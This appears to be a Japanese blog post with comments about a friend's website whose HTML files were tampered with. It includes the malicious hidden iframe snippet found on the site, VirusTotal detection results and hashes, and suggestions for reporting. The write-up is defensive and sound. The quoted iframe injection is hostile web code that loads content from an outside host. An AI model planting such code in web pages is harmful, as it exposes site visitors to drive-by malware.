MaAfee、トレンドマイクロ、ノートンなどの有名ウィルスソフトでも認識されないマルウェアがあるようです。
インターネットウィルスは自然界のインフルエンザに似ていて、常に進化し、それに対するワクチンを開発するように、対策が後手になります。
ケチなので私のPCは無料のAVASTでウィルス対策をしています。ところが、先日AVASTがトロイの木馬を検知しましたと、ある知人のURLにアクセスした際に警告を出しました。
知人はウイルスバスタが常時起動していて問題なくページを表示できると言うので、また、AVASTが誤認識したのだとその時は思いました。 念のため、FTPでデータのデイトスタンプをチェックしてみると、半年以上更新していないHTMLファイルがすべて1週間前の日付でアップデートされていました。
この2年間、Wordpressのphpファイルへの改ざん対策でうんざりしていましたが、どうやら、これは新手の改ざんではないか???
いずれにしてもhtmlへの改ざんは初めてでした。しかも、Googleのウェブマスターツールのマルウェア検知で、問題なしでした。
これは改ざんであっても無害なのか???
FTPでもファイルの中身を見ることができない。
一体、どんな改ざんがあるのだろう???
検索しても日本のサイトではこの現象は見当たらない。satan.phpの時もそうでした。
数日後、たまたま、英語サイトでオンラインチェックできるページを見つけました。
http://sitecheck.sucuri.net/scanner/
ここで知人のドメインを入力すると下記のマルウェアがあることがわかりました。
</html><iframe src="http://autopd.de/counter.php"
style="visibility: hidden; position: absolute; left: 0px; top: 0px"
width="10" height="10"/
どうやらautopd.deも改ざんされているようで、こんどはautopd.deチェックすると
ロシアのURLらしき記述が多数見つかりました。
Wordpressでの改ざんパターンに似ていますが、違いは「問題なし」で サイトへのアクセスが許可されていることです。
改行入れてください
返信削除一瞬ここがやられたのかと思っちゃいますたw
行末に「>」を入れて「html_autopd.txt」でVirusTotalに投げてみました
https://www.virustotal.com/en/file/97bb8a02ca2f23c678d7253cdf38e71cf86874ced50b234d839f9dac25ce6093/analysis/1367558533/
SHA256: 97bb8a02ca2f23c678d7253cdf38e71cf86874ced50b234d839f9dac25ce6093
SHA1: 4ade39b5a4724ccc657a9abae5d1d67340c2d7e6
MD5: a68b47ce809e8c075c619fdf7617e216
File size: 142 bytes ( 142 bytes )
File name: html_autopd.txt
File type: Text
Detection ratio: 13 / 46
Analysis date: 2013-05-03 05:22:13 UTC
Antivirus Result Update
AntiVir HTML/Infected.WebPage.Gen3 20130503
Avast HTML:Iframe-ZG [Trj] 20130503
BitDefender Trojan.Iframe.BMY 20130503
Comodo TrojWare.JS.Iframe.GJ 20130503
DrWeb JS.IFrame.425 20130503
Emsisoft Trojan.Iframe.BMY (B) 20130503
F-Secure Trojan.Iframe.BMY 20130503
Fortinet JS/Iframe.BMY!tr 20130503
GData Trojan.Iframe.BMY 20130503
Kaspersky HEUR:Trojan.Script.Generic 20130503
MicroWorld-eScan Trojan.Iframe.BMY 20130503
Norman Iframe.gen 20130502
nProtect Trojan.Iframe.BMY 20130503
行頭のHTML終了タグを抜いた「iframe_autopd.txt」
SHA256: e215033508c6ebeb5eb3b12cf84b7d125f689b2f5d28f0cae5eb0ca07632da09
SHA1: 87eda14137511a01eecde747a071a9e23c303f2c
MD5: 883daef0d66f7b94163c43ccc62c84a5
File size: 135 bytes ( 135 bytes )
File name: iframe_autopd.txt
File type: Text
Detection ratio: 9 / 46
Analysis date: 2013-05-03 05:24:08 UTC
Antivirus Result Update
BitDefender Trojan.Iframe.BMY 20130503
Comodo TrojWare.JS.Iframe.GJ 20130503
DrWeb JS.IFrame.425 20130503
Emsisoft Trojan.Iframe.BMY (B) 20130503
F-Secure Trojan.Iframe.BMY 20130503
Fortinet JS/Iframe.BMY!tr 20130503
GData Trojan.Iframe.BMY 20130503
Norman Iframe.gen 20130502
nProtect Trojan.Iframe.BMY 20130503
解析お疲れ様でした。
解析ありがとうございます。
削除VirusTotal知りませんでした。今後活用します。
解析を見る限りトロイ系改ざんだと思うのですが、50日たってもGoogleウェブマスタツールはマルウェアなしで検知しません。
こゆのに突っ込む
削除http://www.google.com/safebrowsing/report_badware/
でもぐぐるの警告受けるの待つより、IPAとかに報告して対応を促したほーがいーよーな。
Dr.WEBが反応してるっぽいので、リンクチェッカー通して知らせるのもありかと
http://free.drweb.co.jp/linkchecker/